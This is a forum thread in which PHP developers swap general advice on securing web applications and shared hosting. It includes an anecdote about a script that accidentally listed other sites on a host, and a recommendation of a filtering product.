Have you been hacked ?
Moderator: General Moderators
Have you been hacked ?
Hi all,
just a quick question. Has anyone of you been hacked? If is was your code what did you do to correct it ?
Dr Evil
just a quick question. Has anyone of you been hacked? If is was your code what did you do to correct it ?
Dr Evil
Re: Have you been hacked ?
While I haven't been hacked, I spend a considerable amount of time securing my system, and yes, my code.Dr Evil wrote:Hi all,
just a quick question. Has anyone of you been hacked? If is was your code what did you do to correct it ?
Dr Evil
How do you secure your code? Start by assuming that an attacker wants in, and wants as much access as possible. The first place you want to look is for anything that would give him database or admin access to the application.
Next I look at file permissions.. on a poorly configured host, with loose permissions, it may be possible for an attacker to overwrite files and have them included in your code.
I even look at include() statements, as they often have things like include($somefile). If $somefile gets set by the user, and you don't do proper variable cleaning, you may be including THEIR code.
Finally I try to reduce the dangerous system calls - things like exec(), fopen(), and so on.
Most importantly, I continue to do that, over and over again. I don't ever stop. Security is a process, not a one-time fix.
Hope that helps.
Thanks. That sounds quite smart. I try to code as safe as possible, but can't keep wondering if I'm up to date or if I thought of it all.
This question popped in when I read this post:
viewtopic.php?t=16997
This question popped in when I read this post:
viewtopic.php?t=16997
You probably havent thought of it all, and probably arent up to date.Dr Evil wrote:Thanks. That sounds quite smart. I try to code as safe as possible, but can't keep wondering if I'm up to date or if I thought of it all.
Security is a trade-off. You are trading time spent securing the code to prevent time spent fixing what a hacker does if he gets in.
If you are spending 40 hours a week securing something that would take 2 hours to clean up, well, thats not a great tradeoff.
It sounds like you genuinely care, and try to consistently apply secure principles, and that puts you ahead of 90%* of the coding population.
* - Statistic from "Lies, more lies and statistics - The art of making stuff up for online forum postings".
I haven't been hacked but I did hack the easyspace hosting provider once - entirely by accident. A folder browsing script with an "up a level" method jumped right out of the client's domain and spewed out a list of all the other sites on the (shared) host.
That was a year ago - they still haven't fixed their set up.
That was a year ago - they still haven't fixed their set up.
Thats not neccesarily insecure.McGruff wrote:I haven't been hacked but I did hack the easyspace hosting provider once - entirely by accident. A folder browsing script with an "up a level" method jumped right out of the client's domain and spewed out a list of all the other sites on the (shared) host.
That was a year ago - they still haven't fixed their set up.
Its non-optimal, and it definitely leaves room for bad things to happen, however, its not in-and-of-itself insecure.
Basically, its not chrooting users. If you setup your scripts properly, and have your sensitive information in files that either arent viewable by the webserver, OR, store sensitive information outside of the main web folders, then you should be able to avoid any security issues.
That being said, from your description, they dont use seperate web/non-web trees, and a number of scripts MUST have sensitive information in files viewable by the webserver user. So, yeah, it's probably insecure.. but not for sure.
*I* certainly wouldnt host there..
-
microthick
- Forum Regular
- Posts: 543
- Joined: Wed Sep 24, 2003 2:15 pm
- Location: Vancouver, BC
-
jimbothegrey
- Forum Newbie
- Posts: 1
- Joined: Tue Jan 27, 2004 3:24 am
I don't trust my code...
We use an engine called TotalShield from http://www.applicure.com
It seats outside the Apache/PHP and filters anything that can go wrong...
This is really nice addon... saves a lot of time...
They are also answering fast to questions/requests.
Cheers.
It seats outside the Apache/PHP and filters anything that can go wrong...
This is really nice addon... saves a lot of time...
They are also answering fast to questions/requests.
Cheers.